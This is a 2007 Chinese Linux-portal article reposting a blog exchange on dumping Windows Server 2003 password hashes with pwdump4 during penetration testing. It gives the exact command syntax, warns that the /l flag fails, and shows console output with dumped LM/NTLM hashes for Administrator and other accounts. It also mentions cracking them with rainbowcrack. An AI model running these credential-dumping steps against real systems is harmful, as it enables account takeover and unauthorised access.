Linux中国 Linux中国门户站!
设为主页 设为主页
收藏本站 收藏本站
 
当前位置 :首页 ->操作系统 ->Win2003 / Windows 2003 Server ->正文

Dump Hash From Windows 2003(图)

来源:linuxdby.com 作者:Webmaster 时间:2007-04-12 点击: [收藏] [投稿]

闲着无聊,看看众人的blog,忽发现 包子 同志Blog上一则日志:

获取windows密码hash的两个方式
post by baozi @ 28 九月, 2005 09:47
在给客户做渗透测试的时候,遇到一个win2k3机器,pwdump4读不出密码bash,lc5装上去一读的话LC5就挂掉,突然想到saminside这个东西,似乎记得他有两个读本地密码散列的方式的,一个是一般的通过LSASS读,还有一个就是通过shedule服务来读,还没去搜索后者什么原理,拿上去一试果然行,另存为pwdump文件回来用ranbowcrack跑,哈哈
国内似乎还没有利用shedule服务读密码的cmd程序吧,哪个大虾弄一个就好了,毕竟saminside图形的不方便。
其实以前我也遇到过读不出来密码hash的 w2k3 的机器,只不过你参数用错了 hieei
pwdump4 ip /o:fuckbaozi /u:administrator
用这种格式一般来说可以dump出hash来 ip 换成 127.0.0.1 :D

如果你用 /l 参数, 大部分是dump不出来的,即使dump出来,hash也是不全的.

C:\>pwdump4 127.0.0.1 /o:fuckbaozi /u:administrator
PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.
by bingle@email.com.cn
This program is free software based on pwpump3 by Phil Staubs
under the GNU General Public License Version 2.
Please enter the password >*******
local path of \\127.0.0.1\ADMIN$ is: C:\WINDOWS
connect to 127.0.0.1 for result, plz wait...
SRV>Version: OS Ver 5.2, Service Pack 1, ServerTerminal
LSA>Samr Enumerate 4 Users In Domain DREAM.
All Completed.
C:\>type fuckbaozi
Administrator:500:A02F5A52E33540C0AAD3B435B514042E:00F0E9AB3FE77043C228DDB70E5C4
1A6:::
Guest:501:AAD3B445B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
kaka:1004:9FFBED36199C0D0723WD3B83FA6627C7:E4CCAB020C323DC2411876AE032CD5FF:::
SUPPORT_388945a0:1001:AAD3B435B51404EEAAD3B435B51404EE:3279F1AC07C5E7C1977524375
31BB8B3:::
C:\>pwdump4 /l /o:fuckbaozi /u:administrator
PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.
by bingle@email.com.cn
This program is free software based on pwpump3 by Phil Staubs
under the GNU General Public License Version 2.
SRV>Version: OS Ver 5.2, Service Pack 1, ServerTerminal
C:\>type fuckbaozi
Administrator:500:A02F5322E10540A0AA33B435B51404EE:00F0E9433FE62378C228D4370E5C4
1A6:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
C:\>
如此而已,用pwdump4 ip /o:file /u:user的方式,我还没有发现有不能dump出密码hash的2003系统.



 如果您对本文有任何疑问或者建议,请到讨论区发表您的意见: >> 论坛入口 <<



上一篇: Win2003操作系统25招加速大法   下一篇: Windows Server 2003看过来

文章评论】 【收藏本文】 【推荐好友】 【打印本文】 【我要投稿】 【论坛讨论
更多相关文章
·备份与恢复Win2003的AD数据库
·Windows Server 2003 防火墙
·Win Server2003常见问题及解决然方案
·Windows Server 2003全接触(3)
·Windows Server 2003全接触(2)
·Windows Server 2003全接触(1)
·抠出Windows 2003中的IIS6安装程序
·Windows 2003安全设置大全-2003系统错误大全解释
·Windows 2003安全设置大全-2003系统错误大全解释
·Windows 2003安全设置大全-站点的建立
推荐文章
·站长手册:WIN2003下Web服务器配置
·Windows 2003组策略和安全模板的应
· Windows Server 2003 常见问题
· win2003_iis6服务器设置排错解答~
·远程如何启用Win 2003桌面
·Windows 2003共享资源拒绝访问修复
·Windows 2003安全设置大全-系统权限
· Windows Server 2003实用技巧七则
精彩文章
·怎样备份与保护windows 2003系统服
·手把手教你如何部署Windows 2003的D
·Windows Server 2003全接触(3)
·windows 2003服务器防止海洋木马的
·为Windows 2003加装视频压缩
·Windows 2003 打sp1补丁无法安装的
·轻松配置windows2003自带mail服务器
·自己动手抠出2003中的IIS6安装程序
·Windows 2003 硬盘安全设置[针对ASP
·备份与恢复Win2003的AD数据库
·为Windows 2003服务器打造铜墙铁壁
·实例讲解Windows 2003分区增容功能
·用QQ文件共享漏洞入侵Windows 2003
·抠出Windows 2003中的IIS6安装程序
·Windows 2003 64位正式版抢先体验
·Windows 2003操作系统十例最新配置
· Windows Server 2003实用技巧七则
· Windows 2003技巧七则
· 用Windows 2003部署软件
·Windows Server 2003 安全配置实战
·Windows Server 2003 SP1 今日发布
·Windows Server 2003全接触(2)
·Windows2003系统优化大有玄机
·全方位堵住Windows 2003的安全隐患
· WIN2000安全高级应用--CMD的“特权
·轻松架设Windows 2003用户隔离FTP站
Power by linux-cn.com 粤ICP备05006655号